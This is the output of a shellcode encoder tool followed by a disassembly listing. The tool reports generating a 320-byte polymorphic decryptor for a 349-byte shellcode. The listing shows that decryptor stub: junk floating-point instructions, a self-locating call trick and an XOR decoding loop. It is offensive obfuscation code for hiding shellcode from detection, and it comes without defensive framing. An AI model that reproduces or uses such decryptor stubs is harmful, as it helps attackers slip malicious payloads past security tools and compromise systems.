[+] The decryptor body was generated! [+] Decryptor body size = 320 bytes [+] Shellcode size = 349 bytes [+] Decryptor + Shellcode size = 669 bytes [+] Magic byte is F5 [+] Crypto steping = 3 byte(s) [+] Pass steping = 0 byte(s) [+] Shellcode dumped to D:\asm\shell.txt.tapion_bin [+] Written 674 bytes [+] Shellcode header stored to D:\asm\shell.txt.tapion_bin.h 00401054 2BDB SUB EBX,EBX 00401056 74 09 JE SHORT testsh.00401061 00401058 9B WAIT 00401059 DBE3 FINIT 0040105B D9E4 FTST 0040105D D9E4 FTST 0040105F 09C0 OR EAX,EAX 00401061 F9 STC 00401062 C7C3 DC89184C MOV EBX,4C1889DC 00401068 D9ED FLDLN2 0040106A D9F0 F2XM1 0040106C FD STD 0040106D F9 STC 0040106E 81C3 09F0F54F ADD EBX,4FF5F009 00401074 D8D1 FCOM ST(1) 00401076 85C0 TEST EAX,EAX 00401078 81FB 474F1841 CMP EBX,41184F47 0040107E 81C3 1B86F163 ADD EBX,63F1861B 00401084 66:C7C3 2E5E MOV BX,5E2E 00401089 66:81C3 2FA3 ADD BX,0A32F 0040108E 76 04 JBE SHORT testsh.00401094 00401090 D8D1 FCOM ST(1) 00401092 DDE9 FUCOMP ST(1) 00401094 21FF AND EDI,EDI 00401096 C7C1 9059FFE1 MOV ECX,E1FF5990 0040109C F5 CMC 0040109D D9F0 F2XM1 0040109F 51 PUSH ECX 004010A0 8D0C24 LEA ECX,DWORD PTR SS:[ESP] 004010A3 85C0 TEST EAX,EAX 004010A5 FFD1 CALL ECX 004010A7 F5 CMC 004010A8 D9F2 FPTAN 004010AA F9 STC 004010AB D9F0 F2XM1 004010AD 68 95CC8B6D PUSH 6D8BCC95 004010B2 5A POP EDX 004010B3 81EA 49CA8B6D SUB EDX,6D8BCA49 004010B9 C7C6 9FEAB55F MOV ESI,5FB5EA9F 004010BF DBE2 FCLEX 004010C1 3BD7 CMP EDX,EDI 004010C3 D9FD FSCALE 004010C5 81C6 D664B746 ADD ESI,46B764D6 004010CB 3BF2 CMP ESI,EDX 004010CD FC CLD 004010CE 81EE 754F6DA6 SUB ESI,A66D4F75 004010D4 D9F0 F2XM1 004010D6 DEF1 FDIVRP ST(1),ST 004010D8 D9FF FCOS 004010DA D9E1 FABS 004010DC DDC1 FFREE ST(1) 004010DE 51 PUSH ECX 004010DF 81F8 CC35D935 CMP EAX,35D935CC 004010E5 5E POP ESI 004010E6 79 07 JNS SHORT testsh.004010EF 004010E8 F5 CMC 004010E9 DEC1 FADDP ST(1),ST 004010EB DEE1 FSUBRP ST(1),ST 004010ED D9F4 FXTRACT 004010EF 21F6 AND ESI,ESI 004010F1 8B06 MOV EAX,DWORD PTR DS:[ESI] 004010F3 7B 07 JPO SHORT testsh.004010FC 004010F5 85C9 TEST ECX,ECX 004010F7 D9F1 FYL2X 004010F9 DEE9 FSUBP ST(1),ST 004010FB F5 CMC 004010FC DBE2 FCLEX 004010FE 803E F5 CMP BYTE PTR DS:[ESI],0F5 00401101 DDD9 FSTP ST(1) 00401103 75 20 JNZ SHORT testsh.00401125 00401105 68 A86A2A28 PUSH 282A6AA8 0040110A DDE9 FUCOMP ST(1) 0040110C DEC1 FADDP ST(1),ST 0040110E 5E POP ESI 0040110F DEC9 FMULP ST(1),ST 00401111 81EE A86A2A28 SUB ESI,282A6AA8 00401117 D9D0 FNOP 00401119 D9F2 FPTAN 0040111B 51 PUSH ECX 0040111C 87F1 XCHG ECX,ESI 0040111E D9FD FSCALE 00401120 DEE1 FSUBRP ST(1),ST 00401122 59 POP ECX 00401123 D9E5 FXAM 00401125 D9EA FLDL2E 00401127 D9E5 FXAM 00401129 DEF1 FDIVRP ST(1),ST 0040112B 81EA 3A15C541 SUB EDX,41C5153A 00401131 81F9 7A93030E CMP ECX,0E03937A 00401137 D9F0 F2XM1 00401139 DED9 FCOMPP 0040113B DEE1 FSUBRP ST(1),ST 0040113D 81C2 3815C541 ADD EDX,41C51538 00401143 4A DEC EDX 00401144 D8D1 FCOM ST(1) 00401146 3BCE CMP ECX,ESI 00401148 FD STD 00401149 D9FC FRNDINT 0040114B DBE2 FCLEX 0040114D F0:31040A LOCK XOR DWORD PTR DS:[EDX+ECX],EAX ; LOCK prefix 00401151 D8D9 FCOMP ST(1) 00401153 81FB 268F6140 CMP EBX,40618F26 00401159 D9E1 FABS 0040115B FD STD 0040115C FC CLD 0040115D DEF9 FDIVP ST(1),ST 0040115F D9F7 FINCSTP 00401161 D9E4 FTST 00401163 4B DEC EBX 00401164 E3 06 JECXZ SHORT testsh.0040116C 00401166 DAE9 FUCOMPP 00401168 D9FF FCOS 0040116A 85FF TEST EDI,EDI 0040116C F5 CMC 0040116D 90 NOP 0040116E 4B DEC EBX 0040116F 4B DEC EBX 00401170 81C6 24027E38 ADD ESI,387E0224 00401176 8BC9 MOV ECX,ECX 00401178 F9 STC 00401179 81EE 24027E38 SUB ESI,387E0224 0040117F D9E9 FLDL2T 00401181 D9F9 FYL2XP1 00401183 FD STD 00401184 21DB AND EBX,EBX 00401186 DEE9 FSUBP ST(1),ST 00401188 DDD1 FST ST(1) 0040118A ^0F8F 61FFFFFF JG testsh.004010F1 00401190 D9FB FSINCOS 00401192 DEC9 FMULP ST(1),ST